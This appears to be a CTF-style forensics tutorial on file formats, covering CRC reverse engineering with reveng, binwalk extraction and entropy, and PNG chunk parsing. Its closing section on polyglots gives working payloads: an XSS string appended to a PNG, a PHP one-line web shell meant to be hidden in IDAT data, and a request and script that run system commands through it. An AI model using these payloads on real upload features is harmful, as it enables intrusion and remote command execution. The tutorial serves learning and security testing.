If you want to understand how a file format works, start by looking up its documentation online. These formats are often not readable as ASCII, so you'll want to use a hex viewer or editor, such as xxd, hexedit or hexyl.
A big collection of file formats made by Ange Albertini is the following (just scroll through until you find your format):
CRCs: Cyclic Redundancy Checks
File formats often use a Cyclic Redundancy Check (CRC) to detect whether their bytes have been accidentally corrupted. Think of it as a checksum that condenses all bytes into a few extra bytes, which change if even a single bit of the input changes. CRCs are much weaker than cryptographic hash functions: their purpose is purely to detect accidental changes, not to prevent deliberate collisions, so anyone who modifies the data on purpose can simply recompute the CRC.
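To make the single-bit claim concrete, here is a minimal Python sketch using the CRC-32 variant from the standard zlib module (the same one PNG and gzip use). The helper name crc32_of and the sample bytes are only chosen for this illustration.

```python
import zlib

def crc32_of(data: bytes) -> int:
    """Return the CRC-32 of data as an unsigned 32-bit integer."""
    return zlib.crc32(data) & 0xFFFFFFFF

original = b"123456789"
# Flip the lowest bit of the first byte to simulate a single-bit error.
corrupted = bytes([original[0] ^ 0x01]) + original[1:]

print(f"{crc32_of(original):08X}")                 # CBF43926, the standard check value
print(crc32_of(original) != crc32_of(corrupted))   # True: the change is detected
```

The 4-byte result is all a file format needs to store next to the data to notice this kind of corruption.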
Because there are many different types of CRCs, a site like the following makes it easy to compare your data and output to reverse engineer exactly what algorithm was used. Then you can use this knowledge to create a correct checksum for any arbitrary data:
CRC reveng is another tool built for calculating the CRC parameters from enough samples, so it does not have to be a well-known algorithm.
Compilation
Download and extract the source code, then run make. If you run into the following error, do as it says and change the BMP_BIT and BMP_SUB values inside config.h:
Then you can install the tool using sudo ln -s "$(pwd)"/reveng /usr/bin/reveng.
Usage
Given a CRC width in bits (often 8, 16 or 32), this tool can find the parameters of a CRC algorithm. You need to provide hex strings that each consist of the data followed by its CRC. Such samples can often be recognized as templated data (e.g. lots of nulls or similar fields) followed by 1, 2 or 4 random-looking bytes, which are the CRC. Take the following example:
Hexdump
52 45 43 00 02 00 00 00 04 00 00 00 05 00 00 00 D9 D1 49 38  REC...............I8
52 45 43 00 02 00 00 00 06 00 00 00 07 00 00 00 2F 1E 65 D0  REC............./.e.
52 45 43 00 02 00 00 00 08 00 00 00 09 00 00 00 2E 7B 30 25  REC..............{0%
52 45 43 00 02 00 00 00 0A 00 00 00 0B 00 00 00 D8 B4 1C CD  REC.................
It looks like the last 4 bytes of each row are pretty random. To crack the exact algorithm used, we simply provide the rows to reveng as hex strings, together with the 32-bit width we guessed:
It found all parameters, and the preset name "CRC-32/ISO-HDLC". This is a well-known variant. Next, we can predict the CRC for any sequence of data by specifying a preset:
This correctly computes the CRC for the first string! If the tool did not find a named preset, you can still give it the raw parameters to achieve the same result:
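The raw parameters (width, poly, init, refin, refout, xorout) fully describe a CRC, so you can also reproduce the checksum in your own code. The following is a minimal, unoptimized Python sketch of that parametric model, not reveng's own implementation. The names reflect, crc and CRC32_ISO_HDLC are made up for this example, the parameter values are the published ones for CRC-32/ISO-HDLC, and the sketch assumes a width of at least 8 bits.

```python
import zlib

def reflect(value: int, width: int) -> int:
    """Reverse the order of the lowest `width` bits of value."""
    result = 0
    for _ in range(width):
        result = (result << 1) | (value & 1)
        value >>= 1
    return result

def crc(data: bytes, width: int, poly: int, init: int,
        refin: bool, refout: bool, xorout: int) -> int:
    """Bit-by-bit CRC for widths of 8 bits or more."""
    mask = (1 << width) - 1
    top_bit = 1 << (width - 1)
    reg = init
    for byte in data:
        if refin:
            byte = reflect(byte, 8)
        # Feed the next byte into the top of the register.
        reg ^= byte << (width - 8)
        for _ in range(8):
            if reg & top_bit:
                reg = ((reg << 1) ^ poly) & mask
            else:
                reg = (reg << 1) & mask
    if refout:
        reg = reflect(reg, width)
    return reg ^ xorout

CRC32_ISO_HDLC = dict(width=32, poly=0x04C11DB7, init=0xFFFFFFFF,
                      refin=True, refout=True, xorout=0xFFFFFFFF)

value = crc(b"123456789", **CRC32_ISO_HDLC)
print(f"{value:08X}")                      # CBF43926
print(value == zlib.crc32(b"123456789"))   # True
```

For a different algorithm, swap in the parameters reveng reported. Keep in mind that the file format also decides in which byte order the resulting value is stored.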
Sometimes when data is hidden inside another file, it is simply pasted right into the host file, meaning that the bytes of the secret file sit unchanged somewhere in the other file. Using binwalk you can check a file for known file signatures to see if it embeds something.
Using the following command you can also recursively extract all of these into a .extracted folder:
$ binwalk -eM file.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 TRX firmware header, little endian, image size: 37883904 bytes, CRC32: 0x95C5DF32, flags: 0x1, version: 1, header size: 28 bytes, loader offset: 0x1C, linux kernel offset: 0x0, rootfs offset: 0x0
28 0x1C uImage header, header size: 64 bytes, header CRC: 0x780C2742, created: 2018-10-10 02:12:20, image size: 2150281 bytes, Data Address: 0x8000, Entry Point: 0x8000, data CRC: 0xA097CFEA, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "DD-WRT"
92 0x5C Linux kernel ARM boot executable zImage (little-endian)
2460 0x99C device tree image (dtb)
23432 0x5B88 xz compressed data
23776 0x5CE0 xz compressed data
2117484 0x204F6C device tree image (dtb)
3145756 0x30001C UBI erase count header, version: 1, EC: 0x0, VID header offset: 0x800, data offset: 0x1000
$ binwalk --dd='.*' file.bin # Another way to extract all file signatures
A common false positive with PNGs is Zlib compressed data. PNG uses Zlib to compress its own pixel data, so binwalk recognizes that signature inside every PNG. Very often this compressed data just covers the rest of the file and is not a separately hidden file.
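The idea behind a signature scan is simple enough to sketch in a few lines of Python. This is only an illustration of the principle, not how binwalk is implemented: the SIGNATURES table holds a handful of well-known magic numbers, and the function name find_signatures is made up for this example.

```python
# A few well-known magic numbers; real tools know far more signatures
# and validate the structure that follows each match.
SIGNATURES = {
    "PNG image": b"\x89PNG\r\n\x1a\n",
    "ZIP archive": b"PK\x03\x04",
    "gzip data": b"\x1f\x8b\x08",
    "JPEG image": b"\xff\xd8\xff",
}

def find_signatures(data: bytes):
    """Return a sorted list of (offset, description) for every signature hit."""
    hits = []
    for name, magic in SIGNATURES.items():
        pos = data.find(magic)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(magic, pos + 1)
    return sorted(hits)

# In-memory demo: a PNG signature and a ZIP header buried in filler bytes.
blob = b"A" * 10 + SIGNATURES["PNG image"] + b"junk" + SIGNATURES["ZIP archive"]
for offset, name in find_signatures(blob):
    print(f"{offset:<8} 0x{offset:<8X} {name}")
```

Short signatures like these match by accident in random data, which is one reason false positives show up in real scans.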
You can also use binwalk to understand an unknown file better, for example by looking at its entropy. Entropy measures how random a sequence of bytes is. Plain ASCII text is fairly predictable because it only uses a small part of all possible byte values, so its entropy is low. Compressed or encrypted bytes look completely random, so their entropy is really high, close to 1. You can get a graph of the entropy across the file using the -E flag:
$ binwalk -E file.bin
This can give a good idea about what parts of a file you could look at.
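If you want the numbers rather than a graph, the measurement itself is easy to reproduce. Below is a minimal Python sketch of Shannon entropy per block, normalized to the 0 to 1 range; it is not binwalk's actual code, and the function names and the 1024-byte block size are assumptions made for this example.

```python
import math
from collections import Counter

def entropy(block: bytes) -> float:
    """Shannon entropy of block, normalized to the range 0.0 to 1.0."""
    if not block:
        return 0.0
    total = len(block)
    counts = Counter(block)
    # Sum p * log2(1/p) over every byte value that occurs in the block.
    bits = sum((n / total) * math.log2(total / n) for n in counts.values())
    return bits / 8  # 8 bits per byte is the maximum

def entropy_profile(data: bytes, block_size: int = 1024):
    """Yield (offset, entropy) for each consecutive block of data."""
    for offset in range(0, len(data), block_size):
        yield offset, entropy(data[offset:offset + block_size])

print(entropy(b"\x00" * 1024))      # 0.0: a single repeated byte
print(entropy(bytes(range(256))))   # 1.0: every byte value equally often
```

Running entropy_profile over a file and looking for sudden jumps points to the boundaries between plain, compressed and encrypted regions.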
PNG
Image files like PNG can have a lot of hidden info. It's a relatively complex file format with a lot of room for secrets.
To quickly check whether a file is a completely valid PNG, you can use pngcheck:
$ pngcheck -h
Test PNG, JNG or MNG image files for corruption, and print size/type info.
Usage: pngcheck [-7cfpqtv] file.{png|jng|mng} [file2.{png|jng|mng} [...]]
or: ... | pngcheck [-7cfpqstvx]
or: pngcheck [-7cfpqstvx] file-containing-PNGs...
Options:
-7 print contents of tEXt chunks, escape chars >=128 (for 7-bit terminals)
-c colorize output (for ANSI terminals)
-f force continuation even after major errors
-p print contents of PLTE, tRNS, hIST, sPLT and PPLT (can be used with -q)
-q test quietly (output only errors)
-s search for PNGs within another file
-t print contents of tEXt chunks (can be used with -q)
-v test verbosely (print most chunk data)
-x search for PNGs within another file and extract them when found
$ pngcheck image.png
OK: image.png (1920x1080, 32-bit RGB+alpha, non-interlaced, 96.6%).
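PNG files consist of chunks of bytes that each tell something about the image. Every chunk is made up of a 4-byte length, a 4-byte type, the data itself and a 4-byte CRC-32 checksum calculated over the type and data. The most common chunk is IDAT, which contains the pixel data of the image. An image always ends with an empty IEND chunk, followed only by that chunk's 4 checksum bytes.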
You might see custom chunks being used to embed data, or data appended to the end, after IEND.
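To look for such chunks yourself, you can walk the file by hand. The following Python sketch assumes the standard chunk layout (big-endian length, type, data, CRC-32 over type and data); parse_png and make_chunk are names made up for this example, and the tiny 1x1 image is built in memory purely as a demo.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def parse_png(data: bytes):
    """Return (chunks, trailing): chunks is a list of (type, body, crc_ok)
    tuples and trailing holds any bytes found after the IEND chunk."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk")
        body = data[pos + 8:pos + 8 + length]
        (stored_crc,) = struct.unpack(">I", data[end - 4:end])
        crc_ok = zlib.crc32(ctype + body) == stored_crc
        chunks.append((ctype.decode("latin-1"), body, crc_ok))
        pos = end
        if ctype == b"IEND":
            break
    return chunks, data[pos:]

def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one chunk with a correct length and CRC (used for the demo)."""
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Demo: a 1x1 grayscale PNG with data appended after IEND.
sample = (
    PNG_SIGNATURE
    + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    + make_chunk(b"IEND", b"")
    + b"<svg/onload=alert()>\n"
)
chunks, trailing = parse_png(sample)
for ctype, body, crc_ok in chunks:
    print(ctype, len(body), "CRC ok" if crc_ok else "CRC MISMATCH")
print("trailing:", trailing)
```

Unknown chunk types, CRC mismatches and non-empty trailing data are the places worth a closer look.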
Embed Raw Data (Polyglots)
Some applications allow you to upload files in a way where you can either give the file a .php extension to create a web shell, or set its Content-Type to text/html so that tags inside the raw bytes are rendered, leading to Cross-Site Scripting (XSS). In either case, the application might validate or even transform your image in a way that does not preserve all the original bytes, breaking your payload.
While you can embed a payload in metadata with tools like exiftool, the server might strip it when saving your file:
Another trick is simply appending data to the end of the file. A strict validator such as pngcheck will complain about the extra data after IEND, but the appended bytes could survive on the server:
$ echo '<svg/onload=alert()>' >> example.png
$ hd example.png
...
000009d0 5a b3 07 54 ac 7b 51 fb 78 a7 ea 00 00 00 00 49 |Z..T.{Q.x......I|
000009e0 45 4e 44 ae 42 60 82 3c 73 76 67 2f 6f 6e 6c 6f |END.B`.<svg/onlo|
000009f0 61 64 3d 61 6c 65 72 74 28 29 3e 0a |ad=alert()>.|
000009fc
Lastly, there is a technique that is more resistant to transformation, which uses the IDAT chunks. These normally contain the DEFLATE-compressed data representing the pixels themselves, but this process can be reversed to obtain a sequence of pixels that compresses into a payload like:
<?=$_GET[0]($_POST[1]);?>
If the payload above is executed, you can provide the name of a function you want to call, like system, as the query parameter 0, and the argument you want to give that function as the body parameter 1:
POST /shell.php?0=system HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

1=id
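The same request can be put together in a script. This is a small Python sketch using only the standard library; the host target.example is a placeholder, and the request is only built here, not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request

# Placeholder location of the uploaded file; replace with the real URL.
url = "http://target.example/shell.php?" + urlencode({"0": "system"})
# Form-encoded body: parameter 1 carries the argument for the function.
body = urlencode({"1": "id"}).encode()

request = Request(
    url,
    data=body,
    method="POST",
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)

print(request.get_method(), request.full_url)
print(body, len(body))  # b'1=id' 4
# urllib.request.urlopen(request) would send it and return the response.
```

The body length of 4 matches the Content-Length header in the raw request.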
The process of creating such IDAT payloads, along with a few examples, is described in the following post, which also shows an XSS payload built on the same idea: